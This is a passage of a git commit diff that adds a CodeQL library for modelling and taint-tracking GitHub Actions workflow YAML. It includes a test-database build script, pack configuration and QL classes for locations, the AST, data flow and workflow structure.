ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#1# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119#0#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode#0#e create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/02.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/04.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/1f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/29.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/32.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/46.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/91.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/95.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ab.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/bd.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ce.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/d0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/df.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e6.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/fc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/01.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/03.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/06.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/09.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/10.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/1f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/20.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/24.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/25.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/26.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/28.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/32.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/36.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/3c.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/43.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/45.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/57.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/59.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/60.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/66.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6c.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/74.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/75.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/78.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/83.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/86.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/8d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/96.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/98.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/99.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/9f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a8.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bd.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bf.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ca.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d2.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/dc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/de.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/df.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ef.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f8.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ff.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/07.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/10.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/14.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/18.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/19.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/28.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/2f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/39.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/47.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/4d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/52.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/56.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/59.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/6a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/80.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/85.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/8b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/aa.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ac.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/c1.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ca.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/cc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/da.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/version create mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel create mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/files.rel create mode 100644 ql/src/test-db/db-yaml/default/files.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/folders.rel create mode 100644 ql/src/test-db/db-yaml/default/folders.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel create mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/0/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/0/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/poolInfo create mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel create mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/strings/0/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/strings/0/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/strings/0/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/yaml.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel.checksum create mode 100755 ql/src/test-db/db-yaml/yaml.dbscheme create mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091753.298Z.json create mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091754.191Z.json create mode 100644 ql/src/test-db/log/database-create-20240203.101751.644.log create mode 100644 ql/src/test-db/log/database-index-files-20240203.101752.962.log create mode 100644 ql/src/test-db/src.zip create mode 100644 ql/src/test/changed-files.yml create mode 100644 ql/src/test/inter1.yml create mode 100644 ql/src/test/no-flow1.yml create mode 100644 ql/src/test/no-flow2.yml create mode 100644 ql/src/test/simple1.yml create mode 100644 ql/src/test/simple2.yml create mode 100644 ql/src/test/test.ql create mode 100644 ql/src/test/test.yml diff --git a/build-dbs.sh b/build-dbs.sh new file mode 100755 index 000000000000..dac4753f4d61 --- /dev/null +++ b/build-dbs.sh @@ -0,0 +1,5 @@ +#!/bin/bash +rm -rf ql/src/test-db || true +rm -rf ql/lib/test-db || true +codeql database create ql/src/test-db -l yaml -s ql/src/test +codeql database create ql/lib/test-db -l yaml -s ql/lib/test diff --git a/codeql-workspace.yml b/codeql-workspace.yml new file mode 100644 index 000000000000..ad62591967d0 --- /dev/null +++ b/codeql-workspace.yml @@ -0,0 +1,3 @@ +provide: + - "**/ql/src/qlpack.yml" + - "**/ql/lib/qlpack.yml" \ No newline at end of file diff --git a/ql/lib/actions.qll b/ql/lib/actions.qll new file mode 100644 index 000000000000..2c1d1cee9259 --- /dev/null +++ b/ql/lib/actions.qll @@ -0,0 +1 @@ +import codeql.actions.Ast diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml new file mode 100644 index 000000000000..56f10b81e0c7 --- /dev/null +++ b/ql/lib/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.7 + codeql/dataflow: + version: 0.1.7 + codeql/ssa: + version: 0.2.7 + codeql/typetracking: + version: 0.2.7 + codeql/util: + version: 0.2.7 + codeql/yaml: + version: 0.2.7 +compiled: false diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll new file mode 100644 index 000000000000..3a16bdec40d2 --- /dev/null +++ b/ql/lib/codeql/Locations.qll @@ -0,0 +1,71 @@ +/** Provides classes for working with locations. */ + +import files.FileSystem + +bindingset[loc] +pragma[inline_late] +private string locationToString(Location loc) { + exists(string filepath, int startline, int startcolumn, int endline, int endcolumn | + loc.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) and + result = filepath + "@" + startline + ":" + startcolumn + ":" + endline + ":" + endcolumn + ) +} + +/** + * A location as given by a file, a start line, a start column, + * an end line, and an end column. + * + * For more information about locations see [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +class Location extends @location_default { + /** Gets the file for this location. */ + File getFile() { locations_default(this, result, _, _, _, _) } + + /** Gets the 1-based line number (inclusive) where this location starts. */ + int getStartLine() { locations_default(this, _, result, _, _, _) } + + /** Gets the 1-based column number (inclusive) where this location starts. */ + int getStartColumn() { locations_default(this, _, _, result, _, _) } + + /** Gets the 1-based line number (inclusive) where this location ends. */ + int getEndLine() { locations_default(this, _, _, _, result, _) } + + /** Gets the 1-based column number (inclusive) where this location ends. */ + int getEndColumn() { locations_default(this, _, _, _, _, result) } + + /** Gets the number of lines covered by this location. */ + int getNumLines() { result = this.getEndLine() - this.getStartLine() + 1 } + + /** Gets a textual representation of this element. */ + pragma[inline] + string toString() { result = locationToString(this) } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Providing locations in CodeQL queries](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + exists(File f | + locations_default(this, f, startline, startcolumn, endline, endcolumn) and + filepath = f.getAbsolutePath() + ) + } + + /** Holds if this location starts strictly before the specified location. */ + pragma[inline] + predicate strictlyBefore(Location other) { + this.getStartLine() < other.getStartLine() + or + this.getStartLine() = other.getStartLine() and this.getStartColumn() < other.getStartColumn() + } +} + +/** An entity representing an empty location. */ +class EmptyLocation extends Location { + EmptyLocation() { this.hasLocationInfo("", 0, 0, 0, 0) } +} diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll new file mode 100644 index 000000000000..967a969a6b72 --- /dev/null +++ b/ql/lib/codeql/actions/Ast.qll @@ -0,0 +1,256 @@ +private import codeql.actions.ast.internal.Actions +private import codeql.Locations + +class AstNode instanceof YamlNode { + AstNode getParentNode() { + if exists(YamlMapping m | m.maps(_, this)) + then exists(YamlMapping m | m.maps(result, this)) + else result = super.getParentNode() + } + + AstNode getAChildNode() { + if this instanceof YamlMapping + then this.(YamlMapping).maps(result, _) + else + if this instanceof YamlCollection + then result = super.getChildNode(_) + else + if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) + then exists(YamlMapping m | m.maps(this, result)) + else none() + } + + AstNode getChildNodeByOrder(int i) { + result = + rank[i](Expression child, Location l | + child = this.getAChildNode() and + child.getLocation() = l + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } + + string toString() { result = super.toString() } + + string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } + + Location getLocation() { result = super.getLocation() } +} + +class Statement extends AstNode { + // narrow down to something that is a statement + // A statement is a group of expressions and/or statements that you design to carry out a task or an action. + // Any statement that can return a value is automatically qualified to be used as an expression. +} + +class Expression extends Statement { + // narrow down to something that is an expression + // An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. +} + +/** + * A Job is a collection of steps that run in an execution environment. + */ +class JobStmt extends Statement instanceof Actions::Job { + /** + * Gets the ID of this job, as a string. + * This is the job's key within the `jobs` mapping. + */ + string getId() { result = super.getId() } + + /** Gets the human-readable name of this job, if any, as a string. */ + string getName() { + result = super.getId() + or + not exists(string s | s = super.getId()) and result = "unknown" + } + + /** Gets the step at the given index within this job. */ + StepStmt getStep(int index) { result = super.getStep(index) } + + /** Gets any steps that are defined within this job. */ + StepStmt getAStep() { result = super.getStep(_) } + + JobStmt getNeededJob() { + exists(Actions::Needs needs | + needs.getJob() = this and + result = needs.getANeededJob().(JobStmt) + ) + } + + Expression getJobOutputExpr(string varName) { + this.(Actions::Job) + .lookup("outputs") + .(YamlMapping) + .maps(any(YamlScalar a | a.getValue() = varName), result) + } + + JobOutputStmt getJobOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + + Statement getSuccNode(int i) { + result = + rank[i](Expression child, Location l | + (child = this.getAStep() or child = this.getJobOutputStmt()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +class JobOutputStmt extends Statement instanceof YamlMapping { + JobStmt job; + + JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } + + StepOutputAccessExpr getSuccNode(int i) { result = this.(YamlMapping).getValueNode(i) } +} + +/** + * A Step is a single task that can be executed as part of a job. + */ +class StepStmt extends Statement instanceof Actions::Step { + string getId() { result = super.getId() } + + string getName() { + result = super.getId() + or + not exists(string s | s = super.getId()) and result = "unknown" + } + + JobStmt getJob() { result = super.getJob() } + + abstract AstNode getSuccNode(int i); +} + +/** + * A Uses step represents a call to an action that is defined in a GitHub repository. + */ +class UsesExpr extends StepStmt, Expression { + Actions::Uses uses; + + UsesExpr() { uses.getStep() = this } + + string getTarget() { result = uses.getGitHubRepository() } + + string getVersion() { result = uses.getVersion() } + + Expression getArgument(string key) { + exists(Actions::With with | + with.getStep() = this and + result = with.lookup(key) + ) + } + + Expression getArgumentByOrder(int i) { + exists(Actions::With with | + with.getStep() = uses.getStep() and + result = + rank[i](Expression child, Location l | + child = with.lookup(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + ) + } + + Expression getAnArgument() { + exists(Actions::With with | + with.getStep() = this and + result = with.lookup(_) + ) + } + + override AstNode getSuccNode(int i) { result = this.getArgumentByOrder(i) } +} + +/** + * An argument passed to a UsesExpr. + */ +class ArgumentExpr extends Expression { + UsesExpr uses; + + ArgumentExpr() { this = uses.getAnArgument() } +} + +/** + * A Run step represents a call to an inline script or executable on the runner machine. + */ +class RunExpr extends StepStmt { + Actions::Run scriptExpr; + + RunExpr() { scriptExpr.getStep() = this } + + Expression getScriptExpr() { result = scriptExpr } + + string getScript() { result = scriptExpr.getValue() } + + override AstNode getSuccNode(int i) { result = this.getScriptExpr() and i = 0 } +} + +/** + * A YAML string containing a workflow expression. + */ +class ExprAccessExpr extends Expression instanceof YamlString { + string expr; + + ExprAccessExpr() { expr = Actions::getASimpleReferenceExpression(this) } + + string getExpression() { result = expr } + + JobStmt getJob() { result.getAChildNode*() = this } +} + +/** + * A ExprAccessExpr where the expression references a step output. + * eg: `${{ steps.changed-files.outputs.all_changed_files }}` + */ +class StepOutputAccessExpr extends ExprAccessExpr { + string stepId; + string varName; + + StepOutputAccessExpr() { + stepId = + this.getExpression().regexpCapture("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + varName = + this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getStepId() { result = stepId } + + string getVarName() { result = varName } + + StepStmt getStep() { result.getId() = stepId } +} + +/** + * A ExprAccessExpr where the expression references a job output. + * eg: `${{ needs.job1.outputs.foo}}` + */ +class JobOutputAccessExpr extends ExprAccessExpr { + string jobId; + string varName; + + JobOutputAccessExpr() { + jobId = + this.getExpression().regexpCapture("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + varName = + this.getExpression().regexpCapture("needs\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getVarName() { result = varName } + + Expression getOutputExpr() { + exists(JobStmt job | + job.getId() = jobId and + job.getLocation().getFile() = this.getLocation().getFile() and + job.getJobOutputExpr(varName) = result + ) + } +} diff --git a/ql/lib/codeql/actions/Cfg.qll b/ql/lib/codeql/actions/Cfg.qll new file mode 100644 index 000000000000..df7acf4e1c05 --- /dev/null +++ b/ql/lib/codeql/actions/Cfg.qll @@ -0,0 +1,7 @@ +/** Provides classes representing the control flow graph. */ + +private import codeql.actions.controlflow.internal.Cfg as CfgInternal +import CfgInternal::Completion +import CfgInternal::CfgScope +import CfgInternal::CfgImpl + diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll new file mode 100644 index 000000000000..d1e714e8fbc0 --- /dev/null +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -0,0 +1,10 @@ +/** + * Provides classes for performing local (intra-procedural) and + * global (inter-procedural) data flow analyses. + */ +module DataFlow { + private import codeql.dataflow.DataFlow + private import codeql.actions.dataflow.internal.DataFlowImplSpecific + import DataFlowMake + import codeql.actions.dataflow.internal.DataFlowPublic +} diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll new file mode 100644 index 000000000000..16d5d826aa88 --- /dev/null +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -0,0 +1,10 @@ +/** + * Provides classes for performing local (intra-procedural) and + * global (inter-procedural) taint-tracking analyses. + */ +module TaintTracking { + private import codeql.actions.dataflow.internal.DataFlowImplSpecific + private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific + private import codeql.dataflow.TaintTracking + import TaintFlowMake +} diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll new file mode 100644 index 000000000000..e3be61fd3b99 --- /dev/null +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -0,0 +1,400 @@ +/** + * Libraries for modeling GitHub Actions workflow files written in YAML. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ + +import codeql.actions.ast.internal.Yaml +import codeql.files.FileSystem + +// ALVARO: Make it private +/** + * Libraries for modeling GitHub Actions workflow files written in YAML. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ +module Actions { + /** A YAML node in a GitHub Actions workflow or a custom composite action file. */ + private class Node extends YamlNode { + Node() { + exists(File f | + f = this.getLocation().getFile() and + ( + f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or + f.getBaseName() = ["action.yml", "action.yaml"] or + // ALVARO: Add any yaml files temporary for development + f.getExtension() = ["yml", "yaml"] + ) + ) + } + } + + /** + * A custom composite action. This is a mapping at the top level of an Actions YAML action file. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. + */ + class CompositeAction extends Node, YamlDocument, YamlMapping { + CompositeAction() { + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } + + /** Gets the `runs` mapping. */ + Runs getRuns() { result = this.lookup("runs") } + } + + /** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ + class Runs extends StepsContainer { + CompositeAction action; + + Runs() { action.lookup("runs") = this } + + /** Gets the action that this `runs` mapping is in. */ + CompositeAction getAction() { result = action } + + /** Gets the `using` mapping. */ + Using getUsing() { result = this.lookup("using") } + } + + /** + * The parent class of the class that can contain `steps` mappings. (`Job` or `Runs` currently.) + */ + abstract class StepsContainer extends YamlNode, YamlMapping { + /** Gets the sequence of `steps` within this YAML node. */ + YamlSequence getSteps() { result = this.lookup("steps") } + } + + /** + * A `using` mapping in a custom composite action YAML. + */ + class Using extends YamlNode, YamlScalar { + Runs runs; + + Using() { runs.lookup("using") = this } + + /** Gets the `runs` mapping that this `using` mapping is in. */ + Runs getRuns() { result = runs } + } + + /** + * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ + class Workflow extends Node, YamlDocument, YamlMapping { + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + YamlMapping getJobs() { result = this.lookup("jobs") } + + /** Gets the 'global' `env` mapping in this workflow. */ + WorkflowEnv getEnv() { result = this.lookup("env") } + + /** Gets the name of the workflow. */ + string getName() { result = this.lookup("name").(YamlString).getValue() } + + /** Gets the name of the workflow file. */ + string getFileName() { result = this.getFile().getBaseName() } + + /** Gets the `on:` in this workflow. */ + On getOn() { result = this.lookup("on") } + + /** Gets the job within this workflow with the given job 